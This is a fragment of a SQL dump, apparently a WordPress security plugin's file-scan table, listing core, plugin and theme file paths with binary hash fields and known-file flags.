Zܯ��\\��','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�Np�܂R��','u�����28>�&$�V�㔇̞E��_�v�z�\r','',0,'?'),('��`?u�w�\'q]y','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-instructions.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��WAh�m��*Gd','	\'z��S�s(�W����ξe�Una��QӖ','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�\n���x�r�W5��','�+����-bg6j��װ$� JB}-z���','',0,'?'),('��&�1A�\n*5�¡�','wp-content/plugins/wp-fastest-cache/templates/update_error.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@y�\n�\n�w$a$!�','q:��D��O��x��4����}���*��u�=)','',0,'?'),('�j�S3v9~9oG��O','wp-content/plugins/wordpress-seo/css/dist/score_icon-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�F�\Z(\Zo;�,G�','`Ӷ�yyG��׆\'ߧ����suP&�o��e','',0,'?'),('�(]���H,ú��\"c','wp-content/plugins/redirection/models/log/log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-q�t��8˵�2�6','���wh�U9\"�rWm��	���&���\0�I�','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�/B4��b�LW/��Q	','wp-content/plugins/wp-smushit/app/views/lazyload/disabled-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rz$ẘ�\\t�0R5�\Z','�LVN0ۻ��V�;�u�ՂV��5�ot����','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�M��{0:�\0L���4','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��\Z�)��e���կ','^F^\r� �;�æ�eF˿ydyn0�����¼�','',0,'?'),('�O\'�\'�C�����','wp-content/plugins/wordpress-seo/src/config/migrations/20200702141921_CreateIndexableSubpagesIndex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�D�ḯ:�%�C���s','�WWgn.&p���&\n�o�0����G�HI','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�KG|�9�\\�k','�b�(�_ҕS�E�M*�+ߤh�}�1gz�+{','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�jQc:�1NiD','�k�G寲�\n΃CD#�6�u\Z�քEڣ@K1','',0,'?'),('�r&V`�\r��䑽��C','wp-content/plugins/wordpress-seo/src/builders/indexable-link-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iEs7>�}W��ŵ�I�S','�<0�:|Ѣ�F��v~�9e�Hhz��l8h��Ձ','',0,'?'),('�v�7=$ �;�		O','wp-content/plugins/wp-fastest-cache/css/toolbar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p_��%0ȶF�$�o9','��\\I�1ݰJM�h�V�f�=Y���C�!��','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fR�z���:}q3��\0','�Β��Al��.\n����4˘�rEl�ޕ�W�','',0,'?'),('ً2l�,�i����$','wp-content/plugins/wp-smushit/app/assets/images/smush-placeholder.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��Cj������h','�|=i�ƥ�]�r���f�\Z��o���;���v��','',0,'?'),('ِ����\r8\Z\"�','wp-content/themes/hitmag/inc/kirki/modules/css/class-kirki-modules-css-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���\n�}T���\\{<X','b%C��U��L���7�/��3<v�Fee�4','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('ٱ��MPr��h~���','wp-includes/blocks/post-content/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�R}��7�%��','��CT�R2C��TxTѫc�7�\Z~s�&}��tv�','',0,'?'),('ٽ\0P��zmyJ	ׂ','wp-content/plugins/wp-smushit/app/assets/images/hero.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{〔k�6��6���','&���;��WX��7�n�[x-*��]�\nB��','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�ɯ����^?\r�>�',')OyX�K\'�A���A}a���̣��r-hķ','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�8��lv`�|YYv��','��F�6E��k�!�y�!�h��N��\"��0 ','',0,'?'),('��<�G+&3�9�l','wp-content/plugins/wordpress-seo/src/config/migrations/20171228151841_WpYoastPrimaryTerm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��V?�g9ok5�','��M�Zт�\0�e~?1��ss� �xx#OX','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('�>�~�!�g�q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|­��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('���u��xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('���\Zf)�S�­','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�(P��[�&�~^�','�?�Me��Y�(/��6~�u�os���A','',0,'?'),('�d���yn�����','wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\Z������R�','�au�(�H�Q��m���B\Z�\"�z�y��#','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�ХM�I2�\r|V)m�','/E>�ʾ��3���OY8�Q��-\0�\0�Q','',0,'?'),('�q\n{Kg�k��6�','wp-includes/wp-includes/js/imgareaselect/imgareaselect.css',0,'}(��()��3���󵕯','}(��()��3���󵕯','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('���)��D��','wp-includes/block-i18n.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���!���:D��8�','�f�\\t�M&�\r�1�	$u3��� ���','',0,'?'),('�!L�C�\n���iA','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/webfont.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�%��!l?pEh��','t����0͸�?�hu(U���&�>#����','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�,\r��	�g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H�v�������','t	Nɼ!\'�W���`�1��1���1�኿!�','',0,'?'),('�/l�M�7\Zɕy�r��','wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php',0,'g�b�f>���=���','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f ����@�t>��ɶ{T��8�o�','',0,'?'),('�=���+.y!UWY�kV9','wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͆���gL%R�zm��','u&�L5M�c����	�>�_/M�@ ��lp�','',0,'?'),('�D�$Q#5Ұ�	�','wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css',0,'���;.�K� Ld�-�','���;.�K� Ld�-�','�-��]y|��\"c�n��$�q�0LL��c�@','',0,'?'),('�V���C����dvۦ�','wp-includes/blocks/file/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�@�/�S��2D��','~@m	.3�Q[�J��4k�-�֦�����h','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tJֶ�Dܒ�+�C','��\"uu�g�I$E���D=��\n���Q��g-�TZ','',0,'?'),('�wQ����C{�S�*ɓ�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-nʙ���	�YT�k�',',�(�����xz��g��T�j�n��\'�p>+�=r�','',0,'?'),('�|�#�԰#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��w��h�����s�[','�y׈�h8�Hi*\r!���4*�<9g�V\"�U��','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']3��?s���{|�i�','�%��������\\��Jԥ����[��Q	q�','',0,'?'),('ڋ�]Gd��E�h;��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�1��2f�J\0}�','qx���s%l�j\n��Ϊ;zĚ!�c$�Ї@)�#','',0,'?'),('ڍ�����ab���@','wp-content/plugins/wp-fastest-cache/js/language.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Sּ�.�]���R�','�H��C̜�<����l��->��w��${̉�A','',0,'?'),('ښ��޴�����u�_�','wp-includes/blocks/post-template/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=I�.0S ��[eץΊ','\"����CN2�󕹖,�0�N�p�+)4�&�O�','',0,'?'),('ڛ0��`)�?��gj�$','wp-content/themes/hitmag/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V%���W\n$`\"��/c�','��G��ܷ�B�^��#0�Z�8�;���Q���','',0,'?'),('ڰ�n+?G���9o���v','wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-install-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��dL���\r�=','_�B��\0�&$��b��\n��9��7�����','',0,'?'),('ڱ�JLX\"|�QY�2�','wp-content/plugins/wordpress-seo/src/config/oauth-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':>�[c߅�̫K�','�������4��ӱ���gMbʵ�g�$','',0,'?'),('�Š�#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��(�T�u5��(��+1','wp-content/aiowps_backups/backup.wp-config.php',0,'��2�����$1�&ց��','��2�����$1�&ց��','K~e��)^���(I��Q_�����w��z����Ï�','',0,'?'),('����C+�+��%J}','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js',0,'�883������x��\r','�883������x��\r','��X�����r�q-��N)��nhl�L�$���','',0,'?'),('��̭\n5�B����+�l','wp-includes/blocks/gallery/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׻B����`��@Bpb�','����!� ��\n1>~�]�E\0��:e�G��*','',0,'?'),('��qؼ��\0p,����','wp-content/plugins/wordpress-seo/src/services/health-check/links-table-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r���=��H|N�xa�/�','D\r1#����5�[㋕H>kADȇi\r��','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ч�%Q���R΍','_�1}H���L�%{܀�>�=�\r�g�8��O','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L\Z3`f��і{_z�q',' .IET��أ��J#�J�Uk�7�hy��\\�0�','',0,'?'),('��w�Y�a�5 ��/','wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hi|`�*����]$|�','	̏[ޖvU�jиz�&��:�~{�cRv���M','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�d�\'��~��;{��','�!b�����+<�[-|���*�~g�rU9��Z','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o���n󙀥�C','������_��5�-�iD��M~�F�f��','',0,'?'),('�ƪ�D��|��\"�3��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\02�iY�tyk��{�','ĥ\";���Du\'U_f��*�~�̸�#�\0�qML','',0,'?'),('�.��{���Gtj��=�{','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',0,'xR�	�Y�X���ݤ���','xR�	�Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('�0��z����o�z�hd','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/de.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B��+@&�H�<�','4{�\r�\n���4V��=]e�ryI�Q��[g#','',0,'?'),('�4V��s#�,�Q��','wp-includes/blocks/query-pagination/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y8��ʵ���3���CO','v�x�oN�*�ܚE.�0-\\*��g$\\�~��','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�Ot��\rVe��z�.','wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js',0,'�[/�Zo[�Ǵ��/.','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�k\rN[,�\'�	VC�$Du','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-posts-importing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���6�Q&RbY','���:Ģ6h��R�W��˞G%D��V�g�','',0,'?'),('�n���k�S��-l�Π','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/nativefontwatchrunner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�l��)�D���M�','�d�8�Z|�`���:�O��{�Z8�\r�,\\','',0,'?'),('�r~����s�S�?R?\r','wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-dashboard-summary.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3��<ɃY*��dD','�\'Y��3�|�[�@��m���]b�z��E�H<','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��_rs�\\��t|G;','w��b2\"��%:k�ց��3R�!S�w0	N�O�K�','',0,'?'),('ہ�3�<��̧�>�W','wp-content/plugins/wordpress-seo/src/schema-templates/cooking-time.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�\\��:�LƅB�/�','�����P�qщ���z�6�}� �����5�','',0,'?'),('ۆ:K%&M\0��k֟��','wp-content/plugins/wp-smushit/app/assets/images/plugins-smartcrawl-icon@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E�g@��ғ�-��\0','FR�\0%�d;���ꃮ1�^fE�6q���PY�','',0,'?'),('ۆxD��L��zW#řM','wp-content/plugins/wordpress-seo/packages/js/images/icon-facebook.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pP���x�}��','|�*��Z ��uh@�z;;`F�ÉXCÒ��5m','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cV��\ZӑHj~Tz��3','��Z��bI���ތ���_�J�j���Eq��5�','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('۪��	.�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('ۯ�,:I&o��E�','wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-integrations-upsell.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v-�,�6�S�q�','��\'�La����uM�ǜzU�[t}`̂m^��','',0,'?'),('ۯ����2M��K�f��','wp-content/plugins/wordpress-seo/js/dist/filter-explanation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܇��k��qƗU�O','U�0��p��E� ��ɩ;�8t@��1S[�W��','',0,'?'),('۵Ga]?��� ���\r\n�','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-complete-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5&���Z5oN��','~U�/1d6�e�A[)ye�F�Zᑉ��Q���v','',0,'?'),('۷�����\n�/�','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold-Italic.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��ƭ�`�d�v��','�oWap)�=��q#{d�6�x�����(D�E�','',0,'?'),('��r�����؁=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g��	��e�}�','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('��<*���(�[C��','wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/norwegian-readability-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�~f��9|�D�xw','����Z�h�8�Ͼ�T�/���U�̎�V~�','',0,'?'),('����ǖ����o','wp-content/plugins/wordpress-seo/src/integrations/front-end/redirects.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��sf,��Pҵ�<`','ط�&�\Z\rq\n�z�3��J�0��9è�3�','',0,'?'),('� ��\'����\'���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/ServerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �7�@� �l��','�ClMސ�\'�a�\n�� �/�W�0���n�','',0,'?'),('�$���W�*r�i�uF�','wp-content/plugins/wp-fastest-cache/js/db.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��6	\n�陂r.��','���L/Z��;>a�n	�O�@�2����l�~&','',0,'?'),('�1���<LOG��S�\r','wp-includes/wp-includes/class-wp-block-type-registry.php',0,'rR�M8��u<�V�l��','rR�M8��u<�V�l��','�\Z�7�Q\0����O�C�\r.�D�\0n*���','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�\ntZ�K/-_B�Ҍ�','�[\\��`x��i�m�(u��A��-L��72','',0,'?'),('�3ohyO~�ɍ����','wp-content/plugins/wp-smushit/app/assets/js/smush-rd.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۩(�8B�W\'nDH�/','\ZIX��q�r�3M���\r]�t�>\0���E���','',0,'?'),('�>��n*p[F��B:��','wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��`7l4p��C7','�@���\n�V��l0���菋W=٠��;','',0,'?'),('�P��M�C�6\Z_���ڀ','wp-content/plugins/wp-fastest-cache/templates/cache_path.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' _�<�2m����','��ґ$vw>2p����`Quz]K�2狅��y','',0,'?'),('�d$�#�^ЧVR7ؑ^','wp-content/plugins/wp-cerber/assets/flags/cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|��X���;jzD5','����JH�\nY��Fw�IKץ�S\\�U���~*','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�}�h�k9�yb�(W','���\ZD��Q�^��\\�����9��;�7v��F�','',0,'?'),('ܜoW�$y�=��?Au_�','wp-content/plugins/wp-smushit/core/integrations/class-nextgen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_6��.���9�7p+(}','���s��M\'��/�Ƒ�|������eP�G','',0,'?'),('ܲI�: ��oЪ�\"�','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-homeurl-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��qH��jz�`�','#p}Α��Z�c֕nM.�9�\r���.2�m','',0,'?'),('���.�U�	��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('���ZC�iT5g?�f�/','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/Is.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|24�CV�-+�[F�','Է�_f���)S�^��0�B˝\n[��R��d','',0,'?'),('���ڛ�)$�,��V','wp-content/plugins/wordpress-seo/src/services/health-check/links-table-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƅ��e`��S\n�_��','$XK3��b��T��n��*N(6R�\Z\0>xd�Tch','',0,'?'),('��}o�c����j\0��','wp-includes/wp-includes/pluggable.php',0,'�pq�����EyJ�$��','�pq�����EyJ�$��','�Y�֋Y\0+IBNvk�dE&��Bp����F�','',0,'?'),('�ޒЌ=��ߕ0$�:(','wp-includes/wp-includes/images/arrow-pointer-blue.png',0,'w��b�·*L���[��','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('��U��!�z:�/��','wp-content/plugins/wp-cerber/assets/flags/uz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��\\�pD�\n�z�d','�+����L���S?{�9�~{eVxD�Ϳs�M','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{…��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('��0���\Z/1��~','wp-includes/blocks/query-pagination/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6���HN܅;�E','��#v9܍��Ͽ�a=�[fJ��4S���^','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��Ֆ(�Wx9�X��','-����A����jT_��Ȓ��	P.��T�','',0,'?'),('�׵(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('���J�8��)�Qz�_�','wp-includes/wp-includes/js/wp-list-revisions.min.js',0,'���}�\Z�ۦ_��8K','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('�>�Ui�\Zz�B}J^�G','wp-content/plugins/wp-cerber/assets/flags/de.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<�>�^�l(�>��','��R�w|F�Χ�i<u�v�b���F)A��5%�','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�[6�5��+�	�n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\"	�����;��','',0,'?'),('�`��L\\3-i�_3�S\r�','wp-includes/blocks/code/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����h�w>���C��','#�0�c����k�S��vܾl���n�lJ�7��','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?0�\0��](���5','��|�+N\"���;����&�1�|�3�K��ҁ�','',0,'?'),('�h�Ea����Vq� g','wp-content/plugins/wordpress-seo/admin/import/class-import-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ç\n!Вז�9���?:','���;���l�?q��\"�:�������','',0,'?'),('�|�� e��B�Q�GG','wp-content/plugins/wp-smushit/core/modules/class-resize-detection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'-a�/a�=����A_','���2Z��[`Y�fq�J7*��`�bgځ�t','',0,'?'),('�~V�5VU�60v�bG','wp-content/plugins/redirection/locale/redirection-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�f$����<�6@?','����8;9{	_�h��ǚ(�鰈����^ 